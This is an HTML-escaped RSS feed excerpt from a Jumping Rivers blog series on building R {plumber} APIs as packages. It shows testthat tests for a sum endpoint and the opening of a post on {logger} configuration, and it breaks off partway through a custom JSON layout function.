&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; obj &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;readLines&lt;/span&gt;(file)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# turn json contents into a single string&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste&lt;/span&gt;(obj, collapse &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="testing-tests"&gt;Testing: Tests&lt;/h2&gt;
&lt;p&gt;With all of the setup work done (at least we only need to do that once)
we can finally write tests to address the three levels identified
earlier in the article. We identified three scenarios for the JSON we might
receive, so we can go ahead and store those in a data folder within our
test directory.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└── tests
    ├── testthat
    │   ├── example_data
    │   │   ├── array.json
    │   │   ├── array_objects.json
    │   │   └── single_object.json
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Our test script for this endpoint will then iterate through the files
in this directory and:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Send each example as the body of a POST request and ensure we get a
success response (200)&lt;/li&gt;
&lt;li&gt;Send a mock request object to the wrapper function, ensuring that
data is being parsed correctly and the return object is of the right
shape&lt;/li&gt;
&lt;li&gt;Take the data from the example file, run it through the &lt;code&gt;my_sum()&lt;/code&gt;
function and ensure that the result is correct&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# tests/testthat/test-example.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# iterate through multiple test cases&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pwalk&lt;/span&gt;(tibble&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# get all files in the test data directory&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list.files&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_path&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;example_data&amp;#34;&lt;/span&gt;), full.names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# expected length (shape) of result&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; length &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# expected sums&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sums &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;), &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(file, length, sums){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# use our helper to create the POST body&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; test_case &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_case_json&lt;/span&gt;(file)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# test against running API&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;successful api response&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# skip if not running&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;skip_dead_api&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; httr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;add_headers&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Accept &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;application/json&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Content-Type&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;application/json&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# use our helper to send the data to the correct endpoint&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;api_post&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;/example/sum&amp;#34;&lt;/span&gt;, body &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; test_case, headers &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; headers)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# check our expectation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_equal&lt;/span&gt;(response&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;status_code, &lt;span style="color:#a5d6ff"&gt;200&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# test that the wrapper is doing its job&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;successful api func&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# use helper to create fake request object&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; input &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_fake_post&lt;/span&gt;(test_case)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# execute the function which is exposed as a route directly&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; res &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;api_sum&lt;/span&gt;(input)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# check the output has the expected shape&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_length&lt;/span&gt;(res, length)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# test the business logic of the function&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;successful sum&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# use the data parsed from the test case&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; input &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; jsonlite&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;fromJSON&lt;/span&gt;(test_case)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# execute the logic function directly&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; res &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;my_sum&lt;/span&gt;(input)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# check the result equals our expectation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_equal&lt;/span&gt;(res, sums)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="concluding-remarks"&gt;Concluding remarks&lt;/h2&gt;
&lt;p&gt;With that, we have a setup for our test suite that takes care of a number
of common elements (and can of course be expanded for other HTTP
methods, data types, etc.), along with a consistent approach to testing many cases
at the API service level, the serialization/parsing level and the logic level. As with
the other posts in this series, a dedicated package example is available
in our &lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/r-api-as-package-testing" rel="external"&gt;blogs
repo&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/api-as-a-package-testing/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>API as a package: Logging</title><link>https://www.jumpingrivers.com/blog/api-as-a-package-logging/</link><pubDate>Thu, 22 Sep 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/api-as-a-package-logging/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/api-as-a-package-logging/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/api-as-a-package-logging/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part two of our three-part series:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/api-as-a-package-structure" rel="external"&gt;Part 1: API as a package: Structure&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: API as a package: Logging (this post)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/api-as-a-package-testing/" rel="external"&gt;Part 3: API as a package: Testing&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/blog/api-as-a-package-structure" rel="external"&gt;Part 1&lt;/a&gt; of this series laid out some ideas for how one might structure a &lt;a href="https://www.rplumber.io/" rel="external"&gt;{plumber}&lt;/a&gt; application as an R package, inspired
by solutions such as &lt;a href="https://thinkr-open.github.io/golem/" rel="external"&gt;{golem}&lt;/a&gt; and &lt;a href="https://leprechaun.opifex.org/" rel="external"&gt;{leprechaun}&lt;/a&gt; for &lt;a href="https://shiny.rstudio.com/" rel="external"&gt;{shiny}&lt;/a&gt;. In this installment of the series
we look at adding some functions to our package that will take care of logging as our application runs. If you haven&amp;rsquo;t already, we recommend reading the first installment
of this series, as the example package created for that post is the starting point for this one.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-api-as-a-package-logging"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="getting-started"&gt;Getting started&lt;/h2&gt;
&lt;p&gt;There are numerous packages for logging in the R programming language; one of our favourites is &lt;a href="https://daroczig.github.io/logger/" rel="external"&gt;{logger}&lt;/a&gt; as
it provides a host of useful functions out of the box, yet it remains easily customisable. If you are not familiar with {logger},
we highly recommend reading the articles on its &lt;a href="https://daroczig.github.io/logger/" rel="external"&gt;pkgdown site&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="persistant-logging"&gt;Persistent logging&lt;/h3&gt;
&lt;p&gt;For a deployed application, it is crucial that log messages are persisted to disk. When publishing on &lt;del&gt;RStudio&lt;/del&gt; &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt; Connect,
we at Jumping Rivers like our log messages both to display in the console (where they can be quickly viewed from the web interface) and to be persisted to disk
for future recovery. The {logger} package makes this trivial with &lt;code&gt;logger::appender_tee()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;To set up a logger that both displays in the console and persists to disk using a set of rotating log files, we could do something like:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(logger)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;log&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_appender&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;appender_tee&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# set of 20 rotating log files, each with at most 2000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# lines in&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; file, max_lines &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2000L&lt;/span&gt;, max_files &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;20L&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;By rotating log files, we prevent the logs from consuming an ever-increasing amount of storage, at the cost of overwriting older logs.&lt;/p&gt;
&lt;h3 id="formatting"&gt;Formatting&lt;/h3&gt;
&lt;p&gt;There are numerous formats that could be used for logging, but JSON is a decent choice as it is fairly ubiquitous. The {logger}
package already provides a formatter function for this purpose, &lt;code&gt;logger::formatter_json()&lt;/code&gt;, which can be set as the default formatter. It simply
captures the data sent in a log request as a list and applies &lt;code&gt;jsonlite::toJSON()&lt;/code&gt; to it.&lt;/p&gt;
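&lt;p&gt;As a rough sketch of that formatting step (the &lt;code&gt;payload&lt;/code&gt; list below is purely illustrative and is not taken from {logger} itself), a list of log data can be turned into a JSON string with &lt;code&gt;jsonlite::toJSON()&lt;/code&gt; and recovered again with &lt;code&gt;jsonlite::fromJSON()&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r" data-lang="r"&gt;# illustrative data, standing in for the arguments of a log request
payload = list(request = &amp;#34;meaning of life&amp;#34;, response = 42)

# serialise the list to a single JSON string;
# auto_unbox = TRUE writes length-one vectors as scalars rather than arrays
msg = jsonlite::toJSON(payload, auto_unbox = TRUE)

# the string can be parsed back into a named list
parsed = jsonlite::fromJSON(msg)
names(parsed)
&lt;/code&gt;&lt;/pre&gt;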
&lt;p&gt;The formatter is responsible for converting data into something that can be used for a log message. For organising this data and generating actual records we need a
layout function. {logger} does provide &lt;code&gt;logger::layout_json()&lt;/code&gt;; however, for this application we found it to be not quite what we needed, because we wanted to
be able to log bits of data received in requests to the API. The provided layout function stringifies the JSON object received in, say, a
POST request, which makes any later processing of the log files more difficult. For example:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_formatter&lt;/span&gt;(logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;formatter_json)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_layout&lt;/span&gt;(logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;layout_json&lt;/span&gt;(fields &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;level&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;msg&amp;#34;&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_appender&lt;/span&gt;(logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;appender_stdout)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;foo&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bar&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;z &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;42&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_info&lt;/span&gt;(x, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; y)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; {&amp;#34;level&amp;#34;:&amp;#34;INFO&amp;#34;,&amp;#34;msg&amp;#34;:&amp;#34;{\&amp;#34;1\&amp;#34;:\&amp;#34;foo\&amp;#34;,\&amp;#34;y\&amp;#34;:\&amp;#34;bar\&amp;#34;}&amp;#34;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log_info&lt;/span&gt;(request &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;meaning of life&amp;#34;&lt;/span&gt;, response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; z)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; {&amp;#34;level&amp;#34;:&amp;#34;INFO&amp;#34;,&amp;#34;msg&amp;#34;:&amp;#34;{\&amp;#34;request\&amp;#34;:\&amp;#34;meaning of life\&amp;#34;,\&amp;#34;response\&amp;#34;:42}&amp;#34;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To solve this, we wrote a slightly modified version of the layout function which allows arbitrary objects to be passed through
to the logger. {logger} has some handy &lt;a href="https://daroczig.github.io/logger/articles/customize_logger.html" rel="external"&gt;information&lt;/a&gt; on writing customisations for your logger objects.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;layout_json_custom &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(fields &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;time&amp;#34;&lt;/span&gt;)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;force&lt;/span&gt;(fields)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# structure to match the logger documented requirements&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# for custom layout functions&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;structure&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; level, msg, namespace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA_character_&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .logcall &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sys.call&lt;/span&gt;(), .topcall &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sys.call&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;-1&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .topenv &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;parent.frame&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; json &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; logger&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_logger_meta_variables&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; log_level &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; level, namespace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; namespace,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .logcall &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; .logcall, .topcall &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; .topcall,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .topenv &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; .topenv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# take the message data passed in by the &lt;/span&gt;
